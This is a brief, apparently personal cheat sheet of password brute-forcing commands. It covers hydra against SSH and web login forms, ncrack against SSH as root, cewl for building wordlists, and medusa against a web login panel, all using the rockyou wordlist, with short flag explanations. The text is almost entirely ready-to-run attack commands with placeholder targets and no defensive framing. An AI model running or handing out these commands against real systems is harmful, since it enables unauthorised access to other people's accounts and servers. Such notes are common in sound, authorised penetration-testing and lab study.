ssh crack
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<ip> -V -f-l: username-L: userlist file-p: password-P: wordlist file-V: verbose mode-f: exit when found one-s: specified port
crack web credential
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -Vhttp-post-form: attacks type (POST)<login url>: url to login page^USER^: username placed when bruteforce^PASS^: password placed when bruteforce
Bruteforce SSH password
ncrack -p22 --user root -P /usr/share/wordlists/rockyou.txt <target>Word List generator
cewl -d 2 -m 5 -w wordlist.txt <target url>
wc -l wordlist.txt
-d: depth-m: minimum word length-w: save words to file<target url>: target url
Login brute-forcer
medusa -h <target ip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -n 80 -m DIR:/login/panel -T 10 -f
-h: hostname or IP-u: username-P: wordlist file-M: module execute-n: port number-m DIR:/login/panel: parameter to login panel-T: threads-f: stop when find